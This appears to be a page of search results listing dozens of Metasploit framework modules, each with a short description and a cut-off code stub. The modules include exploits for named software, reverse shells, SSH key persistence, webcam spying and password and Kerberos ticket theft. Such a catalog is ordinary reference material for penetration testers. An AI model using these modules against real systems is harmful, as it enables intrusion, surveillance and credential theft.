6846 matches found
WordPress REST API Content Injection
This module exploits a content injection vulnerability in WordPress versions 4.7 and 4.7.1 via type juggling in the REST API. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress REST API...
SSH Key Persistence
This module will add an SSH key to a specified user or all, to allow remote login via SSH at any time. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'sshkey' class MetasploitModule 'SSH Key Persistence',...
F5 iControl iCall::Script Root Command Execution
This module exploits an authenticated privilege escalation vulnerability in the iControl API on the F5 BIG-IP LTM and likely other F5 devices. This requires valid credentials and the Resource Administrator role. The exploit should work on BIG-IP 11.3.0 - 11.6.0, 11.5.x...
Kaseya VSA Master Administrator Account Creation
This module abuses the setAccount page on Kaseya VSA between 7 and 9.1 to create a new Master Administrator account. Normally this page is only accessible via the localhost interface, but the application does nothing to prevent this apart from attempting to force a redirect. This module has been...
X11 Keyboard Command Injection
This module exploits open X11 servers by connecting and registering a virtual keyboard. The virtual keyboard is used to open an xterm or gnome terminal and type and execute the specified payload. This module requires Metasploit: https://metasploit.com/download Current source:...
Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
Inject a VNC Dll via a reflective loader Windows x64 staged. Tunnel communication over HTTP Windows x64 winhttp This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 745 include...
Windows Outbound-Filtering Rules
This module makes some kind of TCP traceroute to get outbound-filtering rules. It will try to make a TCP connection to a certain public IP address this IP does not need to be under your control using different TTL incremental values. This way if you get an answer ICMP TTL time exceeded packet fro...
Firefox WebIDL Privileged Javascript Injection
This exploit gains remote code execution on Firefox 22-27 by abusing two separate privilege escalation vulnerabilities in Firefox's Javascript APIs. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require...
ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
This module exploits an unauthenticated blind SQL injection in LinkViewFetchServlet, which is exposed in ManageEngine Desktop Central v7 build 70200 to v9 build 90033 and Password Manager Pro v6 build 6500 to v7 build 7002 including the MSP versions. The SQL injection can be used to achieve remot...
Firefox Webcam Chat on Privileged Javascript Shell
This module allows streaming a webcam from a privileged Firefox Javascript shell. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'json' class MetasploitModule 'Firefox Webcam Chat on Privileged Javascript...
Windows Gather Applied Patches
This module enumerates patches applied to a Windows system using the WMI query: SELECT HotFixID, InstalledOn FROM Win32QuickFixEngineering. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windo...
HP LaserJet Printer SNMP Enumeration
This module allows enumeration of files previously printed. It provides details as filename, client, timestamp and username information. The default community used is "public". This module requires Metasploit: https://metasploit.com/download Current source:...
Quantum vmPRO Backdoor Command
This module abuses a backdoor command in Quantum vmPRO. Any user, even one without admin privileges, can get access to the restricted SSH shell. By using the hidden backdoor "shell-escape" command it's possible to drop to a real root bash shell. This module has been tested successfully on Quantum...
HP Data Protector Cell Request Service Buffer Overflow
This module exploits a stack-based buffer overflow in the Hewlett-Packard Data Protector product. The vulnerability, due to the insecure usage of swprintf, exists at the Cell Request Service crs.exe when parsing packets with opcode 211. This module has been tested successfully on HP Data Protecto...
OSX Manage Webcam
This module will allow the user to detect installed webcams with the LIST action, take a snapshot with the SNAPSHOT action, or record a webcam and mic with the RECORD action This module requires Metasploit: https://metasploit.com/download Current source:...
Unix Command Shell, Double Reverse TCP SSL (openssl)
Creates an interactive shell through two inbound connections This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 182 include Msf::Payload::Single include...
Microsoft Windows Deployment Services Unattend Retrieval
This module retrieves the client unattend file from Windows Deployment Services RPC service and parses out the stored credentials. Tested against Windows 2008 R2 x64 and Windows 2003 x86. This module requires Metasploit: https://metasploit.com/download Current source:...
Unix Command Shell, Reverse TCP (via Python)
Connect back and create a command shell via Python This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = :dynamic include Msf::Payload::Single include Msf::Payload::Python include...
Windows Gather Microsoft Outlook Saved Password Extraction
This module extracts and decrypts saved Microsoft Outlook versions 2002-2010 passwords from the Windows Registry for POP3/IMAP/SMTP/HTTP accounts. In order for decryption to be successful, this module must be executed under the same privileges as the user which originally encrypted the password. ...
CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection
This module exploits a SQL injection flaw in CA Total Defense Suite R12. When supplying a specially crafted soap request to '/UNCWS/Management.asmx', an attacker can abuse the reGenerateReports stored procedure by injecting arbitrary sql statements into the ReportIDs element. This module requires...
Measuresoft ScadaPro Remote Command Execution
This module allows remote attackers to execute arbitrary commands on the affected system by abusing via Directory Traversal attack when using the 'xf' command execute function. An attacker can execute system from msvcrt.dll to upload a backdoor and gain remote code execution. This vulnerability...
7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow
This module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies IGSS up to version 9.00.00 b11063. While processing a ListAll command, the application fails to do proper bounds checking before copying data into a small buffer on the stack. This causes a buffer overflow...
Wireshark packet-dect.c Stack Buffer Overflow
This module exploits a stack buffer overflow in Wireshark 'Wireshark packet-dect.c Stack Buffer Overflow', 'Description' = %q This module exploits a stack buffer overflow in Wireshark MSFLICENSE, 'Author' = 'Paul Makowski', Initial discovery 'sickness', proof of concept 'corelanc0d3r ', rop explo...
Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
This module exploits a vulnerability in the Smart INdependent Glyplets SING table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are assumed to be vulnerable as well. This module requires Metasploit: https://metasploit.com/download Current source:...
MacOS X EvoCam HTTP GET Buffer Overflow
This module exploits a stack buffer overflow in the web server provided with the EvoCam program for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload from the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6, 3.6.7, and possibly earlier...
Oracle DB SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE
The module exploits an sql injection flaw in the ALTERHOTLOGINTERNALCSOURCE procedure of the PL/SQL package DBMSCDCIPUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted EXECUTECATALOGROLE have the required privilege. Affected...
UNIX Gather Kerberos Tickets
Post Module to obtain all kerberos tickets on the targeted UNIX machine. Module Options msf use post/multi/gather/unixkerberostickets msf postunixkerberostickets show actions ...actions... msf postunixkerberostickets set ACTION msf postunixkerberostickets show options ...show and set options... m...
Safari Proxy Object Type Confusion
This module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the structure of e....
phpMyAdmin Authenticated Remote Code Execution
phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion, which can be exploited post-authentication to execute PHP code by application. The module has been tested with phpMyAdmin v4.8.1. This module requires Metasploit: https://metasploit.com/download Current source:...
MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya The exploit might FAIL and CRASH a target system depended on what is overwritten The exploit support only x64 target Tested on: - Windows 2012 R2 x64 - Windows 8.1 x64 - Windows 10 Pro Build 10240 x64 - Windows 10 Enterprise...
Sudo Commands
This module examines the sudoers configuration for the session user and lists the commands executable via sudo. This module also inspects each command and reports potential avenues for privileged code execution due to poor file system permissions or permitting execution of executables known to be...
Panda Security PSEvents Privilege Escalation
PSEvents.exe within several Panda Security products runs hourly with SYSTEM privileges. When run, it checks a user writable folder for certain DLL files, and if any are found they are automatically run. Vulnerable Products: Panda Global Protection 2016 'Panda Security PSEvents Privilege...
NetBIOS Response "BadTunnel" Brute Force Spoof (NAT Tunnel)
This module listens for a NetBIOS name request and then continuously spams NetBIOS responses to a target for given hostname, causing the target to cache a malicious address for this name. On high-speed networks, the PPSRATE value should be increased to speed up this attack. As an example, a value...
ATutor 2.2.1 Directory Traversal / Remote Code Execution
This module exploits a directory traversal vulnerability in ATutor on an Apache/PHP setup with displayerrors set to On, which can be used to allow us to upload a malicious ZIP file. On the web application, a blacklist verification is performed before extraction, however it is not sufficient to...
Generate CSV Organizational Chart Data Using Manager Information
This module will generate a CSV file containing all users and their managers, which can be imported into Visio which will render it. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Generate CSV...
Nibbleblog File Upload Vulnerability
Nibbleblog contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code. This module was tested on version 4.0.3. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule...
Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow
This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser encoded audio inside a FLV video, as exploited in the wild on June 2015. This module has been tested successfully on: Windows 7 SP1 32-bit, IE11 and Adobe Flash 18.0.0.160, Windows 7 SP1 32-bit, Firefox 38.0.5 a...
Adobe Flash Player casi32 Integer Overflow
This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in the casi32 method, where an integer overflow occurs if a ByteArray of length 0 is setup as domainMemory for the current application domain. This module has been tested successfully on Windows 7 SP1 32-bit,...
Seagate Business NAS Unauthenticated Remote Command Execution
Some Seagate Business NAS devices are vulnerable to command execution via a local file include vulnerability hidden in the language parameter of the CodeIgniter session cookie. The vulnerability manifests in the way the language files are included in the code on the login page, and hence is open ...
Android Browser RCE Through Google Play Store XFO
This module combines two vulnerabilities to achieve remote code execution on affected Android devices. First, the module exploits CVE-2014-6041, a Universal Cross-Site Scripting UXSS vulnerability present in versions of Android's open source stock browser the AOSP Browser prior to 4.4. Second, th...
NTP Protocol Fuzzer
A simplistic fuzzer for the Network Time Protocol that sends the following probes to understand NTP and look for anomalous NTP behavior: All possible combinations of NTP versions and modes, even if not allowed or specified in the RFCs Short versions of the above Short, invalid datagrams Full-size...
Firefox Gather Passwords from Privileged Javascript Shell
This module allows collection of passwords from a Firefox Privileged Javascript Shell. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'json' class MetasploitModule 'Firefox Gather Passwords from Privileged...
Windows Manage Set Port Forwarding With PortProxy
This module uses the PortProxy interface from netsh to set up port forwarding persistently even after reboot. PortProxy supports TCP IPv4 and IPv6 connections. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...
OpenEMR PHP File Upload Vulnerability
This module exploits a vulnerability found in OpenEMR 4.1.1 By abusing the ofcuploadimage.php file from the openflashchart library, a malicious user can upload a file to the tmp-upload-images directory without any authentication, which results in arbitrary code execution. The module has been test...
Multiple DVR Manufacturers Configuration Disclosure
This module takes advantage of an authentication bypass vulnerability at the web interface of multiple manufacturers DVR systems, which allows to retrieve the device configuration. This module requires Metasploit: https://metasploit.com/download Current source:...
Windows NetLM Downgrade Attack
This module changes the system LmCompatibilityLevel registry value to enable sending LM challenge hashes and initiates a SMB connection to the host specified in the SMBHOST module option. If an SMB server is listening, it will receive the NetLM hashes for the session user. This module requires...
NFR Agent FSFUI Record File Upload RCE
NFRAgent.exe, a component of Novell File Reporter NFR, allows remote attackers to upload arbitrary files via a directory traversal while handling requests to /FSF/CMD with FSFUI records with UICMD 130. This module has been tested successfully against NFR Agent 1.0.4.3 File Reporter 1.0.2 and NFR...
Linux Command Shell, Bind TCP Inline
Listen for a connection and spawn a command shell This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 232 include Msf::Payload::Single include Msf::Sessions::CommandShellOptions def...
Lantronix Telnet Password Recovery
This module retrieves the setup record from Lantronix serial-to-ethernet devices via the config port 30718/udp, enabled by default and extracts the telnet password. It has been tested successfully on a Lantronix Device Server with software version V5.8.0.1. This module requires Metasploit:...
IBM Rational ClearQuest CQOle Remote Code Execution
This module exploits a function prototype mismatch on the CQOle ActiveX control in IBM Rational ClearQuest HttpClients::IE, :uaminver = "6.0", :uamaxver = "7.0", :javascript = true, :osname = OperatingSystems::Match::WINDOWS, :classid = "94773112-72E8-11D0-A42E-00A024DED613", :method =...